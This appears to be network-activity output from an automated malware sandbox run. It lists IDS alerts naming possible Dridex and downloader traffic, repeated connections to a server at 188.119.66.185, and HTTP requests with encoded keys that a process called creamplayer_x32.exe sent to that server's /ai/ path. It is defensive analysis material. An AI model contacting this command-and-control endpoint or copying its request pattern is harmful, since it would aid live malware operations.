2024-12-14T14:09:04.718150+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49931 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:06.325119+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49939 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:07.080336+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49939 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:08.661654+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49946 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:09.360133+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49946 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:11.128945+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49952 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:11.829922+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49952 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:13.599152+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49958 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:14.395279+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49958 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:16.301206+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49966 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:17.032412+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49966 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:18.610269+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49972 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:19.305823+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49972 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:20.892262+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49978 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:21.592309+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49978 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:23.366201+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49984 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:24.084812+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49984 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:25.663334+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49990 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:26.359534+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49990 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:27.945791+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49996 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:28.647792+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49996 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:30.381248+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49999 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:31.084241+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49999 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:32.874192+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 50000 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:33.567818+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 50000 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:35.176443+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 50001 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:35.911468+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 50001 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:37.584228+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 50002 | 188.119.66.185 | 443 | TCP
2024-12-14T14:09:38.363095+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 50002 | 188.119.66.185 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                  Dec 14, 2024 14:08:40.572597027 CET49873443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:40.572906971 CET49873443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:40.572928905 CET44349873188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:40.694314957 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:40.694360971 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:40.694420099 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:40.694706917 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:40.694722891 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:42.381220102 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:42.381331921 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:42.381824970 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:42.381835938 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:42.382025957 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:42.382030964 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:43.099397898 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:43.099466085 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:43.099479914 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:43.099522114 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:43.099674940 CET49880443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:43.099704027 CET44349880188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:43.209677935 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:43.209707022 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:43.209783077 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:43.210071087 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:43.210086107 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:44.699387074 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:44.699486017 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:44.699991941 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:44.700002909 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:44.700154066 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:44.700159073 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:45.394212961 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:45.394288063 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:45.394336939 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:45.394367933 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:45.394645929 CET49886443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:45.394669056 CET44349886188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:45.506699085 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:45.506747961 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:45.506927967 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:45.507056952 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:45.507067919 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:46.971364021 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:46.971425056 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:46.993820906 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:46.993828058 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:46.994127989 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:46.994132042 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:47.666766882 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:47.666845083 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:47.666891098 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:47.666938066 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:47.667181969 CET49892443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:47.667202950 CET44349892188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:47.787681103 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:47.787733078 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:47.787827015 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:47.788069010 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:47.788083076 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:49.442922115 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:49.443044901 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:49.443476915 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:49.443485022 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:49.443681955 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:49.443686008 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:50.137737989 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:50.137816906 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:50.137814999 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:50.137866020 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:50.138160944 CET49898443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:50.138180017 CET44349898188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:50.256469011 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:50.256534100 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:50.256624937 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:50.256917000 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:50.256933928 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:51.908054113 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:51.908215046 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:51.908632040 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:51.908644915 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:51.908802032 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:51.908808947 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:52.602643967 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:52.602709055 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:52.602726936 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:52.602771997 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:52.642349958 CET49904443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:52.642378092 CET44349904188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:52.778759956 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:52.778820038 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:52.778899908 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:52.779256105 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:52.779278040 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:54.447711945 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:54.447881937 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:54.448391914 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:54.448399067 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:54.448617935 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:54.448626041 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:55.148366928 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:55.148437977 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:55.148444891 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:55.148519993 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:55.148699999 CET49910443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:55.148713112 CET44349910188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:55.273595095 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:55.273629904 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:55.273983955 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:55.273983955 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:55.274014950 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:56.927279949 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:56.927354097 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:56.928246021 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:56.928246021 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:56.928256989 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:56.928273916 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:57.629024029 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:57.629101038 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:57.629172087 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:57.629172087 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:57.629401922 CET49913443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:57.629420996 CET44349913188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:57.787599087 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:57.787647009 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:57.787725925 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:57.788175106 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:57.788193941 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:59.449812889 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:59.449950933 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:59.450481892 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:59.450501919 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:59.450727940 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:59.450737000 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.148984909 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.149048090 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.149072886 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.149117947 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.149187088 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.149225950 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.149245024 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.149270058 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.149277925 CET44349919188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.149295092 CET49919443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.259514093 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.259568930 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:00.259706020 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.260330915 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:00.260344028 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:01.721554041 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:01.721611023 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:01.722057104 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:01.722070932 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:01.722215891 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:01.722223043 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:02.419933081 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:02.420020103 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:02.420063019 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:02.420099020 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:02.420315981 CET49925443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:02.420336008 CET44349925188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:02.538357973 CET49931443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:02.538405895 CET44349931188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:02.538897991 CET49931443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:02.538897991 CET49931443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:02.538947105 CET44349931188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:04.010155916 CET44349931188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:04.010229111 CET49931443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:04.011009932 CET49931443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568089962 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568104982 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.568244934 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568273067 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568294048 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.695638895 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.695687056 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.695949078 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.696225882 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.696240902 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.171567917 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.176443100 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.187897921 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.187907934 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.190016985 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.190023899 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.911497116 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.911580086 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.911602020 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.911621094 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.944992065 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.945019960 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:36.075098991 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:36.075136900 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:36.075254917 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:36.075598955 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:36.075613976 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:37.584052086 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:37.584228039 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:37.585139990 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:37.585150003 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:37.587487936 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:37.587493896 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:38.363116026 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:38.363192081 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:38.363291979 CET50002443192.168.2.9188.119.66.185
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Dec 14, 2024 14:07:26.969429970 CET  1.1.1.1  192.168.2.9  0xba8f  No error (0)  shed.dual-low.s-part-0035.t-0009.t-msedge.net  s-part-0035.t-0009.t-msedge.net  -  CNAME (Canonical name)  IN (0x0001)  false
Dec 14, 2024 14:07:26.969429970 CET  1.1.1.1  192.168.2.9  0xba8f  No error (0)  s-part-0035.t-0009.t-msedge.net  -  13.107.246.63  A (IP address)  IN (0x0001)  false
• 188.119.66.185
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.9  49844  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:29 UTC  283  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:30 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:30 UTC  686  IN  Data Raw: 32 61 32 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 34 64 30 31 62 31 63 64 61 33 30 33 61 31 61 64 35 32 65 38 64 64 33 64 31 39 65 35 63 34 38 63 39 37 30 33 66 66 30 64 38 31 38 35 37 36 39 30 65 37 33 63 39 66 36 30 61 37 34 62 64 66 61 35 35 61 66 65 65 65 62 35 32 61 31 37 33 63 65 64 34 32 30 66 31 66 32 64 38 65 65 34 38 31 32 39 31 35 62 39 61 33 34 61 63 33 34
Data Ascii: 2a28b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c4d01b1cda303a1ad52e8dd3d19e5c48c9703ff0d81857690e73c9f60a74bdfa55afeeeb52a173ced420f1f2d8ee4812915b9a34ac34

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.9  49858  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:35 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:35 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:08:35 UTC  24  IN  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.9  49864  188.119.66.185  443  7420  C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-14 13:08:37 UTC  291  OUT  GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:08:38 UTC  200  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:08:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
